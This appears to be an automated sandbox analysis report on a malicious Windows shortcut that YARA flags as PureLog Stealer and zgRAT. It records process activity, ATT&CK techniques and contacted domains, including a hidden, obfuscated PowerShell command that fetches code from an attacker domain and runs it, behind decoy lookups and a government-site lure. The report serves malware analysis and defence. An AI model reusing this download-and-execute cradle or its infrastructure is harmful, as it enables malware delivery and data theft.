Source: powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
Source: svchost.exe, 00000008.00000002.3945308970.000001B072E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPpEx
Source: svchost.exe, 00000008.00000002.3951856457.000001B078453000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: nslookup.exe, 00000004.00000002.1500376688.000002C0F7C08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPPx
Source: nslookup.exe, 00000005.00000002.1501973357.000001CF4B689000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1692468917.000001985AA01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 00000003.00000002.1498122322.0000026DEFD68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nolog -windowst hidde -noexi -noprofile -noninterac -comman ping www.ministryof.gov.pk; nslookup www.elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|powershell

Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman2
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	12 Process Injection	11 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	21 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jKSjtQ8W7O.lnk	37%	ReversingLabs	Shortcut.Trojan.WinLnk
jKSjtQ8W7O.lnk	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ministryofficedownloadcloudserver.screenpont.xyz	188.114.97.3	true	true	unknown
www.google.com	142.250.186.132	true	false	unknown
gateway.discord.gg	162.159.135.234	true	false	unknown
pmo.gov.pk	203.101.184.118	true	true	unknown
www.Elpson.com	unknown	unknown	true	unknown
www.mproton.com	unknown	unknown	true	unknown
1.1.1.1.in-addr.arpa	unknown	unknown	true	unknown
www.ministryof.gov.pk	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/	false	unknown
https://pmo.gov.pk/site/404	true	unknown
https://ministryofficedownloadcloudserver.screenpont.xyz//78/	false	unknown
https://gateway.discord.gg/?v=9&encording=json	false	unknown
http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/	false	unknown
http://ministryofficedownloadcloudserver.screenpont.xyz//78/	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ministryofficedownloadcloudserver.scre	powershell.exe, 00000000.00000002.3950139560.0000028D953F3000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://ministryofficedownloadcloudserver.scre$did/78/	powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmp, jKSjtQ8W7O.lnk	true		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3950139560.0000028D96C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	powershell.exe, 00000000.00000002.4013626129.0000028DAD51F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pmo.gov.pk/site/404y	powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ministryofficedownloadcloudserver.screenpont.xyz	powershell.exe, 00000000.00000002.3950139560.0000028D96B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.000001984294A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pmo.gov.pk/site/404;	powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, jKSjtQ8W7O.lnk	true		unknown
http://crl.ver)	svchost.exe, 00000008.00000002.3952244849.000001B07849E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV2/C:	svchost.exe, 00000008.00000003.1531647828.000001B078210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	false		unknown
http://gateway.discord.gg	powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://geolocation-db.com/jsonPhttp://www.google.com/maps/place/	powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://discord.com/api/v9/channels/	powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://discord.com/api/v9/guilds/	powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/Prod/C:	edb.log.8.dr	false		unknown
http://ministryofficedownloadcloudserver.screenpont.xyz	powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.microsoftf	powershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.io/	powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ministryofficedownloadcloudserver.screenpo	powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ministryofficedownloadcloudserver.scree	powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198440FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gateway.discord.gg:443/?v=9&encording=json	powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://oneget.orgX	powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pmo.gov.pk/site/404v	powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ministryofficedownloadcloudserver.screenpont.xyz//78/the	powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gateway.discord.gg	powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pmo.gov.pk/site/404;$did=	powershell.exe, 00000000.00000002.3947739594.0000028D94C90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D93078000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D9312D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D930C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://oneget.org	powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
